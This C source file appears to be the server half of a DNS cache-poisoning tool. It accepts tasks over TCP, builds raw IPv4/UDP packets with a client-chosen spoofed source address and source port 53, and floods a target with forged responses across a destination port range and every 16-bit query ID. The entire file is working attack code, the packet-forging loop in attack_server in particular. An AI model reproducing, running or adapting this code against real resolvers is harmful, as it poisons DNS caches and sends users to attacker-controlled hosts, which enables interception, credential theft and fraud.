/*
 * 2008+ Copyright (c) Evgeniy Polyakov <johnpol@2ka.mipt.ru>
 * All rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <fcntl.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <poll.h>
#include <time.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include <netinet/udp.h>
#include <netinet/ip.h>

#include "query.h"
#include "attack.h"

/*
 * Defaults for the -a (listen address) and -p (listen port) options.
 * Declared as modifiable arrays because main() keeps them in plain char *.
 */
static char default_server_addr[] = "0.0.0.0";
static char default_server_port[] = "1025";

/*
 * Create an AF_INET socket of the requested type/protocol and bind it to
 * addr:port (port must be numeric, AI_NUMERICSERV).  When proto is
 * IPPROTO_TCP the socket is additionally put into listening state with a
 * backlog of 100.
 *
 * Returns the socket descriptor, or -1 after logging the failure; the
 * descriptor and the getaddrinfo() result are released on every error path.
 */
static int server_init_socket(char *addr, char *port, int type, int proto)
{
	struct addrinfo hint, *res;
	int fd, rc;

	fd = socket(AF_INET, type, proto);
	if (fd < 0) {
		ulog_err("Failed to create a socket");
		return -1;
	}

	memset(&hint, 0, sizeof(hint));
	hint.ai_family = AF_INET;
	hint.ai_socktype = type;
	hint.ai_protocol = proto;
	hint.ai_flags = AI_NUMERICSERV;

	rc = getaddrinfo(addr, port, &hint, &res);
	if (rc != 0) {
		ulog_err("Failed to get address info for %s:%s, err: %s [%d]", addr, port, gai_strerror(rc), rc);
		close(fd);
		return -1;
	}

	rc = bind(fd, res->ai_addr, res->ai_addrlen);
	if (rc != 0)
		ulog_err("Failed to bind to %s:%s", addr, port);
	else if (proto == IPPROTO_TCP && (rc = listen(fd, 100)) != 0)
		ulog_err("Failed to listen at %s:%s", addr, port);

	/* The resolved address is no longer needed on any path. */
	freeaddrinfo(res);

	if (rc != 0) {
		close(fd);
		return -1;
	}

	return fd;
}

/*
 * Print command-line help for program name p.
 *
 * Only options that main() actually parses (getopt string "a:p:h") are
 * listed.  An "-e hwaddr" entry used to be shown here, but no such option
 * is accepted; passing it only printed this help and exited.
 */
static void server_usage(char *p)
{
	uloga("Usage: %s <options>\n", p);
	uloga("	-a addr			- server listen address. Default: %s.\n", default_server_addr);
	uloga("	-p port			- server listen port. Default: %s.\n", default_server_port);
	uloga("	-h			- this help.\n");
}

/*
 * Internet checksum (RFC 1071) over len bytes starting at addr, seeded with
 * csum (udp_cksum() passes the pseudo-header sum here; IP headers pass 0).
 *
 * 16-bit words are accumulated in host byte order.  The one's-complement sum
 * is byte-order independent, so the complemented result can be stored
 * directly into a header's checksum field without htons().  A trailing odd
 * byte is treated as the high-order (first) byte of a zero-padded word.
 *
 * Words are loaded with memcpy() so addr may point into a plain char buffer
 * at any alignment without violating strict aliasing.  The accumulator is
 * unsigned and folded before it can wrap, so long inputs cannot overflow it.
 */
static __u16 in_cksum(const __u16 *addr, register unsigned int len, int csum)
{
	const unsigned char *p = (const unsigned char *)addr;
	__u32 sum = (__u32)csum;
	__u16 word;

	while (len > 1) {
		memcpy(&word, p, sizeof(word));
		sum += word;
		/* fold early so the 32-bit accumulator never wraps */
		if (sum & 0x80000000u)
			sum = (sum & 0xffff) + (sum >> 16);
		p += 2;
		len -= 2;
	}

	if (len == 1) {
		/* odd trailing byte: first byte of a word whose second byte is 0 */
		word = 0;
		memcpy(&word, p, 1);
		sum += word;
	}

	/* fold all carries from the top 16 bits back into the low 16 bits */
	while (sum >> 16)
		sum = (sum & 0xffff) + (sum >> 16);

	return (__u16)~sum;
}


/*
 * UDP checksum over the len-byte datagram at up (header + payload, with the
 * header's check field already zeroed by the caller), including the IPv4
 * pseudo-header built from saddr/daddr.  Addresses are used as given, i.e.
 * in the byte order they will appear on the wire.
 *
 * The pseudo-header's six 16-bit words are pre-summed and handed to
 * in_cksum() as its seed.
 */
static int udp_cksum(__u32 daddr, __u32 saddr,
		     register const struct udphdr *up,
		     register unsigned int len)
{
	union {
		struct {
			__u32 src;
			__u32 dst;
			__u8 mbz;
			__u8 proto;
			__u16 len;
		} ph;
		__u16 pa[6];
	} pseudo;
	int seed = 0;
	unsigned int i;

	pseudo.ph.src = saddr;
	pseudo.ph.dst = daddr;
	pseudo.ph.mbz = 0;
	pseudo.ph.proto = IPPROTO_UDP;
	pseudo.ph.len = htons((__u16)len);

	for (i = 0; i < 6; i++)
		seed += pseudo.pa[i];

	return in_cksum((const __u16 *)up, len, seed);
}

/*
 * Fill the UDP header at hdr for a datagram carrying size payload bytes that
 * immediately follow the header.  Ports are given in host order; addresses
 * are used as-is for the pseudo-header checksum.
 *
 * RFC 768: a transmitted checksum of zero means "no checksum", so a computed
 * value of zero is sent as all ones (0xffff, the equivalent one's-complement
 * zero; this value is the same in either byte order).
 */
static void server_setup_udp_header(void *hdr,
		__u32 daddr, __u16 dport,
		__u32 saddr, __u16 sport,
		int size)
{
	struct udphdr *udp = hdr;
	unsigned int len = sizeof(struct udphdr) + size;
	__u16 sum;

	udp->source	= htons(sport);
	udp->dest	= htons(dport);
	udp->len	= htons(len);
	udp->check	= 0;	/* must be zero while the checksum is computed */

	sum = udp_cksum(daddr, saddr, udp, len);
	udp->check	= sum ? sum : 0xffff;
}

/*
 * Wait up to timeout milliseconds (0 = just check) for activity on socket s.
 *
 * Returns:
 *   1  - data is available to read,
 *   0  - timeout, or poll() was interrupted by a signal (EINTR); callers
 *        simply poll again instead of dropping the client,
 *  -1  - poll() failed, or the socket reported an error, hangup or is not
 *        a valid descriptor (POLLERR / POLLHUP / POLLNVAL).
 *
 * POLLERR/POLLHUP/POLLNVAL are always reported by poll(), so only POLLIN
 * needs to be requested.
 */
static int server_has_new_task(int s, int timeout)
{
	struct pollfd pfd = { .fd = s, .events = POLLIN, .revents = 0 };
	int num;

	num = poll(&pfd, 1, timeout);
	if (num < 0) {
		if (errno == EINTR)
			return 0;
		ulog_err("Failed to poll");
		return -1;
	}

	if (num == 0)
		return 0;

	if (pfd.revents & (POLLERR | POLLHUP | POLLNVAL))
		return -1;

	return (pfd.revents & POLLIN) != 0;
}

/*
 * Build a 20-byte IPv4 header (no options) at hdr for a UDP datagram that
 * carries size payload bytes after the UDP header.  Addresses are copied
 * as-is (expected in network byte order).  TOS, id, fragment offset and the
 * checksum start out as zero; TTL is 64.  The header checksum is computed
 * last, over the finished header.
 */
static void server_setup_ip_header(void *hdr, __u32 daddr, __u32 saddr, __u16 size)
{
	struct iphdr *ip = hdr;
	unsigned int total = sizeof(struct iphdr) + sizeof(struct udphdr) + size;

	/* start from an all-zero header so only non-zero fields need setting */
	memset(ip, 0, sizeof(*ip));

	ip->version	= 4;
	ip->ihl		= 5;
	ip->ttl		= 64;
	ip->protocol	= IPPROTO_UDP;
	ip->tot_len	= htons(total);
	ip->saddr	= saddr;
	ip->daddr	= daddr;

	ip->check	= in_cksum((const __u16 *)ip, ip->ihl * 4, 0);
}

/*
 * Serve one task read from client socket cs, sending datagrams through the
 * raw socket as.
 *
 * Input on cs: a struct attack_data (pmin/pmax/size are converted with
 * ntohs/ntohl; daddr/saddr are used as-is), followed by a.size payload bytes.
 * The payload is received directly behind room for an IPv4 and a UDP header
 * in a fixed 16 KiB stack buffer. a.size is client-controlled, so it is
 * rejected when it does not fit.
 *
 * For each destination port in [pmin, pmax] and each 16-bit id, the
 * payload's query_header id and the UDP header are rewritten and the packet
 * is sent to a.daddr.  The loop stops early when cs becomes readable or
 * reports an error/hangup, or when sendto() fails with anything but EAGAIN.
 * A summary line with packet count and rate is logged on exit.
 *
 * Returns -1 if the task could not be read or was oversized.  Otherwise it
 * returns err at exit:
 *   - 0 when interrupted by activity on cs;
 *   - otherwise the result of the last sendto(), which is negative if that
 *     send failed.
 */
static int attack_server(int cs, int as)
{
	const size_t hdr_len = sizeof(struct iphdr) + sizeof(struct udphdr);
	int err, pmin, pmax, dport, sport, size, id;
	unsigned int req_size;
	struct attack_data a;
	char buf[16*1024];
	struct sockaddr_in sa;
	char *data;
	struct query_header *h;
	int packets;
	struct timeval tv1, tv2;

	memset(buf, 0, sizeof(buf));

	size = sizeof(struct attack_data);
	data = (char *)&a;
	while (size) {
		err = recv(cs, data, size, 0);
		if (err <= 0) {
			ulog_err("Failed to read header from client");
			return -1;
		}

		data += err;
		size -= err;
	}

	sport = 53;
	pmin = ntohs(a.pmin);
	pmax = ntohs(a.pmax);

	/*
	 * The payload goes into buf behind the headers; an unchecked size
	 * from the client would overflow the stack buffer.
	 */
	req_size = ntohl(a.size);
	if (req_size > sizeof(buf) - hdr_len) {
		ulog_err("Query data size %u from client exceeds %zu bytes",
				req_size, sizeof(buf) - hdr_len);
		return -1;
	}
	size = (int)req_size;

	h = (struct query_header *)(buf + hdr_len);
	data = (char *)h;

	while (size) {
		err = recv(cs, data, size, 0);
		if (err <= 0) {
			ulog_err("Failed to read data from client: err: %d", err);
			return -1;
		}

		size -= err;
		data += err;
	}

	size = (int)req_size;

	memset(&sa, 0, sizeof(sa));
	sa.sin_addr.s_addr = a.daddr;
	sa.sin_port = 0;
	sa.sin_family = AF_INET;

	packets = 0;
	id = 0;		/* logged at "out" even when the port range is empty */
	gettimeofday(&tv1, NULL);

	server_setup_ip_header(buf, a.daddr, a.saddr, size);

	for (dport=pmin; dport<=pmax; ++dport) {
		for (id=0; id<=0xffff; ++id) {
			int send_errno;

			err = 0;
			if (server_has_new_task(cs, 0))
				goto out;

			h->id = htons(id);
			server_setup_udp_header(buf + sizeof(struct iphdr), a.daddr, dport, a.saddr, sport, size);

			err = sendto(as, buf, size + hdr_len, 0,
					(struct sockaddr *)&sa, sizeof(struct sockaddr_in));
			/* save errno before usleep() gets a chance to overwrite it */
			send_errno = errno;
			usleep(1);
			if (err <= 0 && send_errno == EAGAIN)
				continue;
			if (err <= 0) {
				char saddr_str[32];
				char daddr_str[32];
				struct in_addr ia;

				ia.s_addr = a.saddr;
				snprintf(saddr_str, sizeof(saddr_str), "%s", inet_ntoa(ia));

				ia.s_addr = a.daddr;
				snprintf(daddr_str, sizeof(daddr_str), "%s", inet_ntoa(ia));

				/* restore sendto()'s errno in case ulog_err() reports it */
				errno = send_errno;
				ulog_err("Failed to send data (id: %04x) to %s:%d -> %s:%d",
						id,
						saddr_str, sport,
						daddr_str, dport);
				goto out;
			}

			packets++;
		}
	}

out:
	gettimeofday(&tv2, NULL);

	{
		double t = (tv2.tv_sec - tv1.tv_sec)*1000000.0 + (tv2.tv_usec - tv1.tv_usec);
		double pps = 0;

		t /= 1000000.0;
		if (t > 0.001)
			pps = (double)packets/t;

		ulog("%s: dport: %d [%d-%d], id: %04x, packets: %d, t: %.1f sec, speed: %.1f pps.\n",
			__func__, dport, pmin, pmax, id, packets, t, pps);
	}

	return err;
}

/*
 * Parse -a/-p, open the TCP listening socket and a raw IPPROTO_RAW send
 * socket, then serve clients one at a time: every time the client socket
 * becomes readable a task is handled by attack_server().  A client is
 * dropped when its socket errors/hangs up or a task fails.
 *
 * Transient accept() failures (EINTR, ECONNABORTED) are retried instead of
 * terminating the server.  Both sockets are closed before returning on
 * error.
 */
int main(int argc, char *argv[])
{
	int ch, s, err, as;
	char *addr, *port;

	addr = default_server_addr;
	port = default_server_port;

	err = 0;
	while ((ch = getopt(argc, argv, "a:p:h")) != -1) {
		switch (ch) {
			case 'a':
				addr = optarg;
				break;
			case 'p':
				port = optarg;
				break;
			default:
				server_usage(argv[0]);
				return -1;
		}
	}

	s = server_init_socket(addr, port, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0)
		return -1;

	as = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (as < 0) {
		ulog_err("Failed to create a socket");
		close(s);
		return -1;
	}

	while (1) {
		int cs;
		socklen_t salen;
		struct sockaddr_in sa;

		salen = sizeof(sa);
		cs = accept(s, (struct sockaddr *)&sa, &salen);
		if (cs < 0) {
			/* signal delivery or a client that reset before accept */
			if (errno == EINTR || errno == ECONNABORTED)
				continue;
			ulog_err("Failed to accept new client");
			close(as);
			close(s);
			return -1;
		}

		ulog("Accepted client %s:%d.\n", inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));

		while (1) {
			err = server_has_new_task(cs, 1000);
			if (err < 0)
				break;
			if (!err)
				continue;

			err = attack_server(cs, as);
			if (err < 0)
				break;
		}

		close(cs);
	}

	return 0;
}


